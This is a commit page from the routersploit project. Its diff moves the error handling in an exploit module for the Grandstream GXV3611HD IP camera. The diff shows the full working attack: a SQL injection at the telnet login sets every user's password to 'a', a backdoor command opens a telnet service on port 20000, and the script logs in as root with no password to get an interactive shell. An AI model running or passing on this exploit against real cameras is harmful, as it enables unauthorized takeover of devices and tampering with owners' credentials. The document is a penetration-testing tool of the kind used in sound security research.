Skip to content

R
routersploit
Commit 311d72d9 by Joshua Abraham
Options

Moved try-catch to check method and removed unnecessary except

parent e949a544
Showing with 38 additions and 39 deletions
routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py
...@@ -30,50 +30,49 @@ class Exploit(exploits.Exploit): ...@@ -30,50 +30,49 @@ class Exploit(exploits.Exploit):
port = exploits.Option(23, 'Target port') # default port port = exploits.Option(23, 'Target port') # default port
def run(self): def run(self):
try: if self.check():
if self.check(): print_success("Target appears to be vulnerable...")
print_success("Target appears to be vulnerable...")
try: try:
conn = telnetlib.Telnet(self.target, self.port) conn = telnetlib.Telnet(self.target, self.port)
conn.read_until("Username: ") conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a' conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a'
conn.read_until("Password: ") conn.read_until("Password: ")
conn.write("nothing\r\n") conn.write("nothing\r\n")
conn.read_until("Username: ") conn.read_until("Username: ")
conn.write("admin\r\n") conn.write("admin\r\n")
conn.read_until("Password: ") conn.read_until("Password: ")
conn.write("a\r\n") # Login with the new password conn.write("a\r\n") # Login with the new password
conn.read_until("> ") conn.read_until("> ")
conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup. conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
conn.read_until("> ") conn.read_until("> ")
conn.write("quit\r\n") conn.write("quit\r\n")
conn.close() conn.close()
print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell") print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell")
except: except:
print_error("Exploit failed. Could not log in.") print_error("Exploit failed. Could not log in.")
try: try:
conn = telnetlib.Telnet(self.target, 20000) conn = telnetlib.Telnet(self.target, 20000)
conn.read_until("login: ") conn.read_until("login: ")
conn.write("root\r\n") conn.write("root\r\n")
conn.read_until("Password: ") conn.read_until("Password: ")
conn.write("\r\n") conn.write("\r\n")
conn.read_until("# ") conn.read_until("# ")
print_success("Authenticaiton Successful") print_success("Authenticaiton Successful")
conn.interact() conn.interact()
except: except:
print_error("Failed to log into backdoor.") print_error("Failed to log into backdoor.")
else: else:
print_error("Exploit failed. Target does not appear vulnerable") print_error("Exploit failed. Target does not appear vulnerable")
except Exception as err:
print_error("{}".format(err))
@mute @mute
def check(self): def check(self):
conn = telnetlib.Telnet(self.target, self.port) try:
conn = telnetlib.Telnet(self.target, self.port)
except:
return False
output = conn.read_until("login:") output = conn.read_until("login:")
if 'Grandstream' in output: if 'Grandstream' in output:
return True return True
else: return False
return False
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment